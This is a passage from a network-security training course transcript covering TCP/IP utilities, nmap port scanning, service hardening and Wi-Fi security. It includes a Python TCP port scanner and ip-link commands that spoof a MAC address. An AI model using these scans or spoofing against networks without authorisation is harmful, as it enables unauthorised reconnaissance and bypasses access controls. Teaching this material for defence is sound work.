works is that when you contact a device on your local area network only, your machine will store in memory – it will cache – the hardware or MAC address of that device, so that the next time you try to connect to that IP, it will not have to send out a broadcast asking which device owns that IP and to return its MAC address. It will already be cached here in memory.
So, for instance, 192.168.1.1 here is my default gateway, my local router. Because I've gone on the Internet recently, I can see it's cached the Physical or MAC Address of my default gateway here. You will not cache
the MAC Address of remote hosts on other networks. The closest you'll get to that is caching the MAC address
of your default gateway. There is also the NS look-up or name server look-up command. I'm going to type
nslookup which puts me into interactive mode. It tells me which DNS server I'm connected to, which is a
Google public DNS server. [He executes the following command: nslookup. The following output is
displayed: Default Server: google-public-dns-a.google.com, Address: 8.8.8.8.] Now, from here, I can test or
learn about DNS records. For instance, if I were to type www.eastlink.ca, it would return an answer in terms of
the IP Address for that host. [He executes the following command: www.eastlink.ca. The following output is
displayed: Server: google-public-dns-a.google.com, Address: 8.8.8.8, Non-authoritative answer:, Name:
www.eastlink.ca, Address: 24.222.14.12.] Now that's being listed here as nonauthoritative because my Google
DNS server does not control the eastlink.ca DNS zone. At the same time, I could change the type of record I'm
looking at. I might type set type=mx to switch to MX record queries. And I might type whitehouse.gov. [He
executes the following command: set type=mx, whitehouse.gov.] Now this is going to show me any SMTP
mail servers that service e-mail addresses for people at whitehouse.gov. So we've got a number of very interesting
Windows utilities built into the operating system that can be used for reconnaissance, ideally for legitimate
purposes or for testing and troubleshooting of TCP/IP network issues.
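If you'd rather script those lookups than use nslookup interactively, here's a rough Python equivalent (an editorial sketch – the answers depend entirely on whichever DNS servers the host points to, and the reverse lookup only works if a PTR record exists):

```python
import socket

name = "www.eastlink.ca"

# Forward lookup: name -> IPv4 addresses (roughly what nslookup showed).
addresses = sorted({r[4][0] for r in socket.getaddrinfo(name, None, family=socket.AF_INET)})
print(name, "->", addresses)

# Reverse (PTR) lookup of the first answer, if one is published.
try:
    hostname, _, _ = socket.gethostbyaddr(addresses[0])
    print(addresses[0], "->", hostname)
except socket.herror:
    print(addresses[0], "has no PTR (reverse) record")
```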
After completing this video, you will be able to understand which Linux tools to use when configuring and
troubleshooting TCP/IP.
Objectives
understand which Linux tools to use when configuring and troubleshooting TCP/IP
[Topic title: Use Common Linux TCP/IP Utilities. The presenter is Dan Lachance.] In this video, we'll learn
how to use common Linux TCP/IP utilities. Much like Windows operating systems, UNIX and Linux variants
include a number of commands built into the operating system that you can use to configure TCP/IP or to
troubleshoot or check out settings related to TCP/IP. Here in Kali Linux, in the left-hand bar, I'm going to click
on the second icon to start a Terminal. [Dan opens the root@kali:~ window.] Now, here in the Terminal
where I can type commands, we're going to maximize the screen. We're going to start by typing ifconfig which
stands for interface config. Here I can see I've got two interfaces – eth0 for Ethernet 0 and my local loopback
interface. From an Ethernet 0 interface, I see things like my IPv4 and IPv6 addresses [He highlights the
following lines in the output: inet 192.168.1.151 and inet6 fe88::20c:29ff:fece:7dfd.] along with my subnet
mask. [He highlights the following line in the output: netmask 255.255.255.0.] I can also see my MAC
address, [He highlights the following line in the output: ether 00:0c:29:ce:7d:fd.] my hardware address on the
Ethernet network, and so on.
But what I'm missing here are things such as whether or not I've got a default gateway and whether or not I'm
pointing to certain DNS service for name resolution. Let's start with DNS. I'm going to type clear to clear the
screen. And I'll use the cat command to display the contents of a text file under /etc called resolv.conf. [He
executes the following command: cat /etc/resolv.conf. The following output is displayed: # Generated by
NetworkManager, search silversides.local, nameserver 8.8.8.8, nameserver 192.168.1.1.] Now this file
contains information related to the DNS servers I'm pointing to. In this case, there are two, along with
my DNS domain suffix, which in this example is silversides.local. Now, at the same time, if I simply type
route, I can also see here that I've got a default gateway configured on this machine. And what you're going to
notice here is that whenever you've got a route to 0.0.0.0, that is the default route. Now of course, we could test
that all this is working, for instance, by pinging something on the Internet by name.
So maybe I'll ping www.google.com. Now, unlike Windows, it's going to keep replying if that device replies to
ICMP echo requests. So, to stop the ping replies, I could press Ctrl+C. But, just like in Windows, that only
tells me if the target device is responding or not. If it's not, I don't know where the problem lies. So I can use
the traceroute command to determine that. So I'll type traceroute – R-O-U-T-E, this is all one word – Spacebar
and I can use either an IP address or a name. Here I'm going to use a name such as www.eastlink.ca. And the
first thing I notice is it's going through in step 1 or line 1, my local default gateway. Then the next thing would
be the next router on the network that gets me to the Internet and further and further through the provider
network. So each line represents a router. Now the bottom half of the screen output here isn't showing the name of a router or any samples of how many milliseconds it takes to get a response from that router.
That usually means that the routers at that level are firewalled and therefore don't reply back because
traceroute, like ping, also uses ICMP. Although it is a different type of transmission, it's using ICMP as its
transport mechanism. Other important commands include netstat. For example, if I type netstat -a for all and of
course I'm going to pipe that to more so it stops after the first screen full of output. [He executes the following
command: netstat -a | more.] The first thing you see at the top here are any local listening ports. [The output is
displayed in a tabular format which shows the following details of the listening ports: Proto, Recv-Q, Send-Q,
Local Address, Foreign Address, and State.] So for example, I can see that this Linux host is listening for SSH
connections. Now I could give it command-line switches to display numeric ports because we know that SSH
of course listens on TCP port 22. So I can see that that is listening. Over in the foreign address, no one is
connected because if anyone were connected to the SSH daemon, we would see their address on a higher-level
port.
So, much like in Windows, we can see which active ports we've got locally and remotely as we are connected
to other services over the network as well using the netstat command. I'm going to press Ctrl+C to cancel the
rest of that screen output. Now we can also use the arp command here in Linux [He executes the following
command: arp.] to view information about IP address to MAC address resolution. So, for example here, there
is an entry in this list in memory on this Linux host called gateway. And it doesn't give me the IP address.
Rather, it simply gives the name of the default gateway, just gateway is what it says. And then I see the
hardware address for it. So any machines I've communicated with recently on the local area network only will
show up in this ARP listing. Finally, there are commands in Linux that we can use to retrieve information about DNS, or to test that DNS is in fact working. One is the dig command. If I were to
type dig www.google.com, it would return information related to DNS records. So here we can see we've got
numerous A records returned with the various IP addresses that service the www.google.com web site. We also
have the NS look-up – name server lookup – command here in Linux [He executes the following command:
nslookup.] much like we do in Windows where I could just type it in to enter interactive mode and then start
querying things such as www.google.com, and it returns information related to that. I would type exit to get
out of NS look-up's interactive mode. In this video, we learned how to use common Linux TCP/IP utilities.
In this video, you will learn how to configure and scan for service ports.
Objectives
[Topic title: Configure and Scan for Open Ports. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to configure and how to scan for open ports. A port number in TCP/IP uniquely identifies a
service running on a host such as a web server listening on TCP port 80. Of course, communication back to a
client happens on a higher-level port. Some network services allow administrators to configure the listening
port. Let's take a look here in our Windows Server by going to the Start menu and searching for IIS. Then we
will start the Internet Information Services (IIS) Manager tool [Dan opens the Internet Information Services
(IIS) Manager window. Running along the top of the window, there is a menu bar with the following menus:
File, View, and Help. The window is divided into two sections. The first section is a navigation pane, which is
named Connections. It contains a Start Page expandable node, which further contains the following
expandable subnode: SRV2012-1 (FAKEDOMAIN\Administrator). The selection made in the first section
displays the information in the second section. The second section is divided into the following four
subsections: Recent connections, Connection tasks, Online resources, and IIS News.] where in the left-hand
navigator, I'll expand the name of our server, I'll expand Sites, and then I'll right-click on the Default Web
Site [Under the Sites suboption in the Connections pane, he selects the Default Web Site suboption. As a
result, its information gets displayed in the second section with the heading Default Web Site Home. On right-
clicking the Default Web Site suboption, a list of options appears. He selects the Edit Bindings option.] where
I'll choose Edit Bindings. [On clicking Edit Bindings, the Site Bindings dialog box opens which displays two
bindings. Also it contains the following buttons: Add, Edit, Remove, Browse, and Close.] Here we can see our
web server has two bindings – one for https on TCP Port 443 and another for http on TCP Port 80.
So notice here on the right, we can Add new port bindings – we can even tie them to different IP addresses if
the server has multiple IPs, but we can also select an existing binding and Edit it and change things like the
Port number [He clicks the Edit button in the Site Bindings dialog box. As a result, the Edit Site Binding dialog
box opens. It contains two drop-down list boxes, namely Type and IP address; and two text fields, namely Port
and Host name.] if we really wanted to. Now you might do that for additional security so that anyone that
wants to connect to, for instance, a web site with a different port number would have to have knowledge of that
port number because it's not listening on the standard listening port. Now, at the same time, [He closes the Edit
Site Binding and Site Bindings dialog boxes.] there are plenty of tools out there both for Windows and Linux
that allow us to scan for ports. Here in Kali Linux, [The root@kali:~ window opens.] we can use the nmap
tool to scan either a network range or, in this example, a single host to see which TCP ports are open and what services this host is running.
This is part of reconnaissance, whether it's used for legitimate purposes or whether it's used for evil. So the
command here is nmap -sT for TCP and then I've given it the IP address of our Windows web server. Now
when I press Enter on that, after a moment, it will give me a listing of open TCP port numbers, one of which
certainly will include port 80 because we know that it is a web server. So we can see, we have quite a list of
open ports here including TCP port 80 HTTP. [He highlights the following line in the output: 80/tcp open
http.] We can also scan for UDP ports. I'm going to use the up arrow key to bring up a command that I've run
previously. I'm using nmap with -sU for UDP. Then I'm using -p to specify the port number I want to scan on a
host. In this case, I want to scan UDP port 53, which is the port DNS servers listen on for client queries.
So, when I press Enter in fact, [He executes the following command: nmap -sU -p 53 192.168.1.162.] I can see
that that specific port is actually open. So I know that that is a DNS server that is listening. And again, this is
all part of reconnaissance. Now we also have the option of scanning a range of machines for certain ports. For
instance, if I were to type nmap -sT for TCP and then I'll give it a range 192.168.1.100-200 and then press
Enter, it's going to scan for TCP open ports on all of those hosts. Once nmap completes the scan, down at the
bottom, I can see in this case, it's scanned 101 IP addresses, where 8 hosts are up. And, as I scroll back up
through, I can see the IP addresses and the open TCP ports on each of those IP addresses. Now sometimes, you
get fewer or more ports. It depends on what services are running on the machine and whether or not it's got a host-based firewall that limits what ports you can see.
But either way, it's pretty easy to scan for open ports to see what's running. Now, from a malicious standpoint,
the bad guys and girls will be interested in this information because if they see, for instance, that there is an
FTP or a DNS server open on a host, they can then focus on that to determine what kind of FTP or DNS server
is running and check out version information, find out what exploits are available, and then begin
compromising systems in that manner. In this video, we learned about configuring and scanning for open ports.
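For comparison, here's a bare-bones Python sketch in the spirit of an nmap -sT connect scan (illustrative only – nmap itself is far more capable, and you should only scan hosts you're authorized to test):

```python
import socket

def scan_tcp(host: str, ports, timeout: float = 0.5):
    """Return the ports on 'host' that accept a full TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

# The target address here is the example web server from the demo.
print(scan_tcp("192.168.1.162", [22, 25, 80, 443, 3389]))
```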
[Topic title: Network Services. The presenter is Dan Lachance.] In this video, I'll talk about network services.
Network services listen on a TCP or a UDP port number for connections. So, for example, with the client DNS
query where a client is contacting a DNS server, the source port would be a higher-level UDP port – in this
case, for example, 55298. But the destination port would be unchanging because that's the network service
listening port – in this case, UDP port 53 for a DNS server. Services will often require specific permissions on
the host operating system. Now, where we can, we should try to stay away from a normal user account that has
a password that never expires or no password at all. Instead, if possible, we should configure network services
to use a managed service account. Now, in the Windows environment, this is a special type of account that is
designed for use by services where it has a complex password that will change automatically on a scheduled
basis.
Here, on a Windows device, if we look at the running Services [The Services window is open. It is divided into
two sections. The first section is a pane in which Services (Local) option is selected by default. As a result, its
information is displayed in the second section. The second section contains two tabs: Extended and Standard.
The information in the second section in the Extended tabbed page displays various services such as System
Events Broker, Superfetch, and Server.] and if we were to double-click on one and open it up, [Dan double-
clicks the Server option. As a result, the Server Properties (Local Computer) dialog box opens. It contains the
following four tabs: General, Log On, Recovery, and Dependencies.] in the properties, we would see a Log On
tab where we can determine whether the service logs on with a Local System account, whether it interacts with
the desktop, or whether it's configured to use a user or a managed service account. Now one thing to watch out
for is the temptation of using an administrative type of account that has way more permissions than the service
really needs. Required services should be configured in the underlying OS with permissions according to the
principle of least privilege. This means that we only assign enough permissions for the service to function
properly and no additional permissions are given. We should also configure services to control incoming
traffic sources.
So, for example, if we have a Linux host that's managed through SSH, we might require that SSH traffic
come from a known and trusted IP network range, maybe a subnet where the administrative stations exist. This
can also reduce discoverability when a malicious user is performing network scans over the network. We
should also enable encryption and authentication wherever possible. Now this can be application specific, such as
when we configure an SSL or TLS certificate, for example, for a web site, POP3 mail server, or an SMTP
server. However, we could also have encryption and authentication at a much more general level in the form of
IPsec, regardless of the higher-level protocol used.
Hardening a host means disabling unused services. At least that's one part of hardening a host. So we can
harden a host by blocking unused ports and services. And, of course, if they're disabled, then they're not
running in the first place anyway. We can also configure services in some cases to use a nonstandard port.
Now you might do this, for instance, on a web server so that when someone types in the address of the web
server in their web browser address bar, they also have to add a colon and then the port number you've
configured. Now web servers normally listen on TCP port 80 or if it's secured, port 443. But you could change
it to a nonstandard port. That also makes it more difficult for a malicious user to scan the network and map it out
based on what services they think are running because you're not using the normal service port numbers.
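For example, a client reaching a web site that's been rebound to a nonstandard port has to name that port explicitly. The Python sketch below is hypothetical – the host name and port 8080 are placeholders for whatever binding you actually configured in IIS:

```python
import urllib.request

url = "http://intranet.fakedomain.local:8080/"  # placeholder host and nonstandard port

try:
    with urllib.request.urlopen(url, timeout=5) as response:
        print(response.status, response.reason)
except OSError as exc:
    print(f"Could not reach {url}: {exc}")
```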
Another way to harden a network service is to take log files resulting from a specific service and store
them on a different host. This is important because if the host on which a service is running is compromised,
then the log files are meaningless. They could be wiped, their contents could be forged, and so on. It's always
crucial that we apply the latest updates to the service and the underlying operating system hosting that service.
Some services can also be throttled. Now this might be true with some replication services that are designed
for file transfer between hosts. The great thing about this is, if we configure throttling, it prevents
monopolization of resources like CPU utilization or network bandwidth.
Network service hardening tools include some built-in items that you'll find in some operating system
environments. So an Active Directory domain environment would use Group Policy to centrally configure
settings on devices. So we could use Group Policy to centrally disable services, potentially for thousands of computers joined to the domain. So, in this example, [The Group Policy Management window is open. The
window is divided into two sections. The first section is a navigation pane. It contains a Group Policy
Management node which further contains the Forest:fakedomain.local subnode. This subnode includes the
Domains subnode which further includes the fakedomain.local subnode. This subnode includes the Default
Domain Policy option. The second section displays the content on the basis of the selection made in the first
section. The second section displays the information of the Default Domain Policy.] I'm in the Group Policy
Management tool for my Active Directory domain. I'm going to right-click on the Default Domain Policy GPO
on the left. And I'm going to Edit it. [He right-clicks the Default Domain Policy option. As a result, a shortcut
menu appears from which options can be selected. He selects the Edit option.] The goal here is we're going to
disable services centrally using group policy. [On selecting the Edit option, the Group Policy Management
Editor window opens. This window is divided into two sections. The first section is a navigation pane which
contains the Default Domain Policy [SRV2012-1.FAKEDOMAIN.LOCAL] node. This node contains two
subnodes: Computer Configuration and User Configuration. The second section displays the information on
the basis of the selection made in the first section.]
Now you might say Group Policy is not a security hardening tool. Well, it can be. It depends how you use it.
We don't want to get into the mindset of thinking only third-party tools are useful for hardening because that's
definitely not the case. So, here inside this GPO, I'm going to go on to Computer Configuration [The
Computer Configuration subnode contains two subnodes: Policies and Preferences.] on the left. I'm going to
expand Policies. I'm going to expand Windows Settings. And there are a number of things I could look at here.
For example, [The Policies subnode includes the Windows Settings subnode which further includes the
Security Settings subnode.] if I go on to Security Settings, well, naturally I have a lot of Security Settings
related to things like the File System, the Windows Firewall with Advanced Security, Public Key Policies for
PKI, and so on. But one of the things you'll see here under Security Settings on the left is System
Services. [He clicks the System Services option in the Security Settings subnode.] And, if I click that on the
right, I get an alphabetical listing of services.
So maybe what I'll do is click in that list and press R and go down to Remote Registry. Now, if I know that we
don't need the Remote Registry service running and we don't depend on it for any of our tools, then I might turn
it off to prevent remote access to the registry on a Windows host. So, if I were to double-click on it, [On
clicking the System Services option, its information gets displayed in the second section. He clicks the Remote
Registry option in the second section. As a result, the Remote Registry Properties dialog box opens.] I could
"Define this policy setting" and either set that service to Disabled or Manual. Now, once I've done this, [In the
Remote Registry Properties dialog box, he checks the following checkbox: Define this policy setting. And he
clicks the Manual radio button. Then he clicks the OK button.] Group Policy would have to refresh on
machines affected by this Group Policy object. Now that can take a couple of hours in some environments. It
really depends on your environment and how you're structured. Other ways to harden network services on a
device include tools like Microsoft System Center Configuration Manager or SCCM. SCCM can be
used to apply security baselines to Windows and Linux device collections to make sure they align with
organizational security policy. We might also use Microsoft PowerShell Desired State Configuration or DSC
which can be used to harden both Windows and Linux hosts. Network services apply at the application layer
primarily with higher-level protocols, such as Hypertext Transfer Protocol or Secure Shell. Now, even though
these are higher-level protocols that might apply to Layer 7 of the OSI model – the application layer – that
doesn't imply that they involve user interaction. In this video, we discussed network services.
After completing this video, you will be able to explain common wired and wireless network concepts.
Objectives
[Topic title: Wired and Wireless Networks. The presenter is Dan Lachance.] In this video, I'll talk about wired
and wireless networks. Wired networks are faster than wireless networks, which transmit signals through the air.
They're also considered more secure since it's harder to physically gain access to wired transmission media than
it is to signals going through the air. Now, with wired networks, wiretaps are possible; however, physical
access to the cables is required. With wireless networks, we have slower connection speeds than we do with
their counterpart – wired networks. They are considered less secure than wired and malicious users don't need
physical access to network gear in order to tap into wireless signals because they're flying through the air. As
long as they are within range and they have the right equipment, they can capture that traffic as it's being
transmitted.
Wireless networks also include cellular, where the infrastructure is owned by a telecom carrier. Bluetooth
is a personal short-range wireless technology used for things such as wireless
keyboards, wireless mice, media devices like Bluetooth speakers that you can hook your smartphone up to
without cables, as well as wireless headsets, and so on. The Wi-Fi standard is what most of us are using at
home in our personal networks, although you will see it in the enterprise as well when secured properly. It has a
longer range than Bluetooth. Of course it's very convenient for users to connect to a Wi-Fi network. However,
the downside is it's easy for malicious users to configure a rogue hotspot. Now a rogue hotspot is what appears
to be a legitimate hotspot that users can connect to on their wireless network, but it's really been set up by a
malicious user to capture the connection information that a wireless client is transmitting.
IEEE has numerous standards including the 802.1x standard. Not to be confused with the 802.11 Wi-Fi
standard, this is different. 802.1x isn't specifically for wireless, but it can be used with wireless. But what is it?
It's a security standard. With 802.1x, we configure our network such that authentication is required prior to
being given network access. This is called network access control or NAC – N-A-C – for short. WEP stands
for Wired Equivalent Privacy. This is a wireless security standard as well. And it's an encryption standard. But
it's been deprecated for many years now because it's been proven to be easily exploited with freely available
tools in a matter of seconds. WPA stands for Wi-Fi Protected Access. This supersedes the deprecated WEP
encryption standard. It uses TKIP, which stands for Temporal Key Integrity Protocol, where we have a
changing key either on a timed basis or every so many packets, for instance, every 10,000 packets to make it
harder to crack the key.
WPA is superseded by WPA2, Wi-Fi Protected Access version 2, which is enhanced by using AES, the Advanced
Encryption Standard, for encryption. Now WPA and WPA2 can run in either Enterprise mode where a
centralized RADIUS authentication server authenticates user access to the network. So in other words, the
wireless endpoints – the wireless access points and routers – aren't doing the authentication. They're just
handing it off to the RADIUS server. That's WPA and WPA2 Enterprise. The personal equivalents for WPA
and WPA2 simply use a preshared key that is configured on the wireless access point or router. And that same
key must be entered when a client wishes to connect to that WLAN.
Now having a centralized RADIUS authentication server is part of the overall IEEE 802.1x security standard.
So how can we harden wireless networks since they are much more susceptible to attacks than their wired
counterparts? One way is to disable the SSID broadcast. The SSID is the name of the wireless network. And,
with most wireless networks, that's being transmitted for ease of connections from people that want to connect
to the network because they just scan the vicinity for wireless networks. They see the name, they click on it.
However, if we've disabled the SSID broadcast, it doesn't show up. So this means that people have to type in
the name of the wireless network, which is often case sensitive, before they can connect. Additionally, a password
is usually required as well.
We can also enable MAC address filtering on our wireless network. What this does is allow us to either build a
list of allowed or denied MAC addresses. Now a MAC address is a Layer-2 address according to the OSI
model. It's the 48-bit hexadecimal address tied to a physical network card of some kind. Normally, what's done
on a wireless network is we add a list of allowed MAC addresses. So, if your device has a wireless card with a
MAC address that matches the allowed list, you're allowed to at least attempt to connect to the wireless
network because usually there's also a passphrase or WPA2-Enterprise where there is a RADIUS server that
you also have to authenticate to.
Just bear in mind that MAC addresses are very easily spoofed with freely available tools (see the short sketch
after this paragraph). Another way to harden the wireless network is, of course, to use WPA2-Enterprise so that
authentication isn't done by the wireless access point or router. Instead, it just forwards it off to a central
RADIUS server. We could also consider
disabling DHCP. Because, with DHCP enabled on a wireless network, once people connect to the
network, we're giving them a valid IP configuration. Disabling it is just one more thing that could make it more
difficult for a malicious user to gain access to the network. We should also enable HTTPS administration so
that we don't have clear-text type of transmissions when admins are connecting over the network to the
wireless router or access point to administer it. So we should use HTTPS where possible.
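Here's the short sketch mentioned above showing just how little effort MAC spoofing takes on a Linux host. It assumes an interface named wlan0, and the address shown is an arbitrary, locally administered example.

  # take the interface down, assign a new hardware address, and bring it back up
  sudo ip link set dev wlan0 down
  sudo ip link set dev wlan0 address 02:11:22:33:44:55
  sudo ip link set dev wlan0 up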
Of course, we should patch wireless router firmware. Most of us know that we should be patching software all
the time but what about firmware, especially in wireless routers? There have been numerous cases where there
have been security vulnerabilities found in router firmware for wireless networks. So be sure to always keep up
to date, maybe subscribe to vendor web sites for your wireless router equipment to make sure you know when
there is a new firmware update. Here you're looking at the configuration page in a web browser for an Asus
wireless router. [The configuration page of the ASUS Wireless Router RT-N66U tool is divided into two
sections. The first section contains two subsections: General and Advanced Settings. The General subsection
includes several options such as Network Map, Guest Network, and Traffic Manager. The Network Map
option is selected by default. The second section displays the information on the basis of the selection made in
the first section. The second section includes subsections such as Internet status, Security level, and System
Status. The System Status subsection contains three tabs: 2.4GHz, 5GHz, and Status. The 5GHz tab is selected
by default. Its content includes various fields such as Wireless name(SSID) and WPA-PSK key and drop-down
list boxes such as Authentication Method and WPA Encryption.] Now, here under the System Status section
over on the right, we can see there is a drop-down list for Authentication Method for the wireless network.
"Open System" means it's not secured at all. Here it's set to WPA2-Personal, where down below, it's using
AES encryption. And we can see there is a preshared key or a PSK that's configured here on the wireless
router. People would have to know that to make a connection from their desktops, laptops, smartphones, and so
on. But, from the Authentication Method list, I could also choose WPA2-Enterprise where I would use a
centralized authentication server – a RADIUS server – rather than the authentication being done here on the
wireless router. At the same time, if I were to click on the Wireless Advanced Settings over on the left with
this particular model, now the menus will differ depending on your wireless router. [In the Advanced Settings
subsection of the first section, Dan selects the Wireless option. As a result, its information is displayed in the
second section. The second section includes several tabs such as General, WPS, and WDS. The General tab is
selected by default. It includes several fields such as Band, SSID, and Hide SSID.]
But, over on the right, I have the option to Hide SSID or not. Notice here it's set to No, which means that it is
broadcasting the SSID. Anyone within proximity – within range of my wireless network – will see the name
being broadcast. Now the name – if we go back to the Network Map section over on the left, we can see here
the name of this wireless network is linksys5GHz. So that would be seen because it's not been suppressed from
being broadcast. Now, over on the left – if I were, for example, to click on LAN...now when I do that, [In the
Advanced Settings subsection of the first section, he clicks the LAN option. As a result, its information is
displayed in the second section. The second section includes tabs such as LAN IP, DHCP Server, and Route.
The LAN IP tab is selected by default. It contains two fields: IP Address and Subnet Mask.] it opens up a new
menu system where, for instance, I could go on to the DHCP Server tab and disable DHCP. Currently it's set to
Yes. It is currently enabled. [He clicks the DHCP Server tab. As a result, its information gets displayed which
contains several sections such as Basic Config and Enable Manual Assignment. The Basic Config section
includes several fields such as Enable the DHCP Server, Lease time, and Default Gateway.] If I scroll down
and choose the Administration menu link down on the left...and remember these menu links in these interfaces
are going to change even when you apply a firmware upgrade to your current router. [In the Advanced Settings
subsection of the first section, he clicks the Administration option. As a result, its information is displayed in
the second section which includes several tabs such as Operation Mode, System, and Firmware Upgrade.] I
have the option of going to the Firmware Upgrade tab where I can see which firmware version we're currently using.
And also, we would have to specify of course the New Firmware File that I want to apply to my wireless
router. And, on the left back onto Wireless one more time, we can see we have a Wireless MAC Filter tab [In
the Advanced Settings subsection of the first section, he clicks the Wireless option. As a result, its information
is displayed in the second section which includes several tabs such as General, WDS, and Wireless MAC
Filter. He clicks the Wireless MAC Filter tab.] where we could specify which specific MAC addresses, if I
choose Yes to turn that on, [The Wireless MAC Filter tabbed section contains two subsections: Basic Config
and MAC filter list (Max Limit: 64). The Basic Config subsection contains two drop-down list boxes: Band
and MAC Filter Mode. It also contains Enable MAC Filter field, adjacent to it are two radio buttons: Yes and
No. He selects the Yes radio button for the Enable MAC Filter field.] should be allowed to connect to this
wireless network.
[Topic title: Use Common Wireless Tools. The presenter is Dan Lachance.] In this video, I'll demonstrate how
to use common wireless tools in both the Windows and Linux operating systems. Let's start with Windows 10
where I've already started the Network and Sharing Center. [The Network and Sharing Center window is open.
In this window, there are two sections. The first section is a navigation pane which has the following options:
Control Panel Home, Change adapter settings, and Change advanced sharing settings. The second section has
the following subsection displayed: View your basic network information and set up connections. Under this
subsection, there are two subsections: View your active networks and Change your networking settings.] In
the Network and Sharing Center, we can see any active network connections that we have over here on the
right. I see that I'm connected to a network called linksys, which is the name of a wireless network. And we're
connected through our interface called Wi-Fi. So I'm going to click on Change adapter settings over on the
left [In the navigation pane, Dan clicks the Change the adapter settings option. As a result, the Network
Connections window opens. It displays various network adapters such as Ethernet, Ethernet 3, and Wi-
Fi.] where I can see I've got my Wi-Fi network adapter as I've named it and it's connected to the linksys
wireless network. As with any network adapter, [He right-clicks the Wi-Fi network adapter. As a result, a
shortcut menu appears from which options can be selected.] wireless networks are really no different in the
sense that we can go into the Properties of adapters for them and we can configure things [From the list of
options, he selects the Properties option. As a result, the Wi-Fi Properties dialog box opens. It contains two
tabs: Networking and Sharing. Under the Networking tab, there are the following three sections: Connect
using, This connection uses the following items, and Description.] such as Internet Protocol Version 4
(TCP/IPv4), Internet Protocol Version 6 (TCP/IPv6), and so on. In the case of a wireless network connection,
there is also a Sharing tab that we might go into to allow other networks that we might be connected to, [He
clicks the Sharing tab in the Wi-Fi Properties window. Under this, he checks the following checkbox: Allow
other network users to connect through this computer's Internet connection.] including wired networks to
access the Internet through our wireless connection. However, I'm not going to do that, I'm going to Cancel.
Now, in the Windows environment as well, I can go down into the taskbar area and click on the arrow to get a
list of wireless networks.
Now any wireless networks that are hidden will show up as Hidden Network. And, when you click on it,
you've got to specify the name of the wireless network that you want to connect to, and it's case sensitive.
Now, beyond that, if you have to supply a passphrase or anything like that, that will also be required in
addition. But, in the Windows environment, we can also use Group Policy essentially in Active Directory to
configure wireless network settings. I've started the Group Policy Management tool where, on the left, I can see
the Default Domain Policy GPO, or Group Policy Object. [The Group Policy Management window opens. In
the first section, the Default Domain Policy folder is selected by default and its content is displayed in the
second section.] I'm going to right-click on it and Edit it because I want to essentially configure Wi-Fi settings
for many clients with this central single configuration. [The Group Policy Management Editor window is
open. In the first section, under the Computer Configuration subnode, there are two subnodes: Policies and
Preferences.] So, therefore on the left, what I would have to do to make that happen is under Computer
Configuration, I would expand Policies, Windows Settings, and then Security Settings.
Now, under here, what you're going to see on the left is Wireless Network (IEEE 802.11) Policies. So I'm going
to expand that. Now there is nothing to see yet. And so, if I click on it on the right, I see that nothing has been
configured. So, to configure something on the right, I would right-click [In the navigation pane, under the
Security Settings subnode, he selects the Wireless Network (IEEE 802.11) Policies option. In the second
section, he right-clicks and a shortcut menu appears from which options can be selected.] and "Create A New
Wireless Network Policy for Windows Vista and Later Releases". [The New Wireless Network Policy
Properties window opens. It contains two tabs: General and Network Permissions. The General tab is selected
by default. It includes three fields such as Policy Name, Description, and Connect to available networks in the
order of profiles listed below. The third field contains a table with no entries. There are several columns in it
such as Profile Name, SSID, and Authentication. Below this table, there are the following buttons: Add, Edit,
Remove, Import, and Export.] So essentially, what I would be doing here when I click the Add button is
adding an Infrastructure type of wireless network not an Ad Hoc [He clicks the Add button. As a result, a list
of options appears, he selects the Infrastructure option. Then the New Profile properties dialog box opens.] or
peer-to-peer network where I would specify the SSID of the network, [The New Profile properties window
contains two tabs: Connection and Security. The Connection tab is selected by default. Under this tab, there
are various fields such as Profile Name and Network Name(s) (SSID).] whether we should connect to it
automatically, and so on. Now, under Security, I can specify the type of security whether it's WPA-
Personal [Under the Security tab, there are two drop-down list boxes: Authentication and Encryption.] which
requires only a preshared key or whether it's WPA2-Enterprise which uses a centralized RADIUS
authentication server. But the one thing I can't configure here is passphrases.
So the user will still have to know that; they will be prompted for it when they connect for the first time. But the nice
thing about this is when Group Policy refreshes on Windows clients, which could take a few hours in some
environments, this will automatically be configured as a wireless network setting for them. It saves us from
having to do it individually on each wireless client. Now let's flip over to the Linux side, where in various
Linux variants, yes, we can use the GUI interface to configure wireless settings. But we're going to do it at the
command-line level, which is pretty standard and generic. Here, in Kali Linux, at the terminal prompt, [The
root@kali:~ window is open.] the first thing I will do is type iw dev to show any wireless devices. [He
executes the following command: iw dev.] Here I can see I've got an interface called wlan0. So that's the one
that we're going to be working with. Now what I could do is use the command iwlist, Spacebar, the name of
my interface wlan0, Spacebar, scan. Now I'm going to pipe that to the "more" command. The pipe symbol is
the vertical bar symbol. You get that by shifting your backslash key. I'm doing this because I want to stop
after the first screen full of information because this is going to list the wireless networks that are visible to this
station.
Now, when I do that, it will list a lot more than just the wireless network names or SSIDs. It's going to list a lot
of details [He executes the following command: iwlist wlan0 scan | more.] for each wireless network that
shows up in the list. So, for instance, here I can see my first wireless network and notice that the ESSID is
actually not really visible. It looks like a bunch of x's and 00's because this is a hidden network. But I can see
other details like the MAC address, the channel, the frequency, and whatnot. So, as I go through this
screen output, I'll see various SSIDs for different networks that were seen from this command. Now what I
could do is bring that command back up with the up arrow key. Instead of piping it to more, I'm going to pipe
it to the grep line filter where I am going to take a look for SSID in capitals. [He executes the following
command: iwlist wlan0 scan | grep SSID.] This is going to filter only the lines that contain the text SSID. So, if
all I'm looking for are the names of the wireless networks, then this might be the way to go when using
iwlist. So here I can see the first entry again as a hidden wireless network, then I see others like linksys,
ASUS_Guest1, and so on. So now that I've gotten this far, the next thing I want to do is configure my station to
connect to the linksys network. So I'll do that by typing iwconfig wlan0 – that's my wireless interface. And I'll
tell it that the ESSID I want to connect to is called linksys. Now this will work even if it was a hidden wireless
network. [He executes the following command: iwconfig wlan0 ESSID linksys. The following output is
displayed: Error for wireless request "Set ESSID" (8B1A) :, SET failed on device wlan0 ; Operation already
in progress.] Now, if I already have a connection to that wireless network which I do, I will get a message that
states that the operation is already in progress. So this is expected in this particular case.
Now the next thing that I could do is use the wpa_passphrase tool to specify the WPA passphrase in a file that
I will feed in to my connection, to that wireless network called linksys. So I'm going to use wpa_passphrase,
then I'm going to give it the name of my wireless network linksys. And I'm going to give it the passphrase for
WPA. So I am going to put it in the proper case and then use output redirection – so the greater than
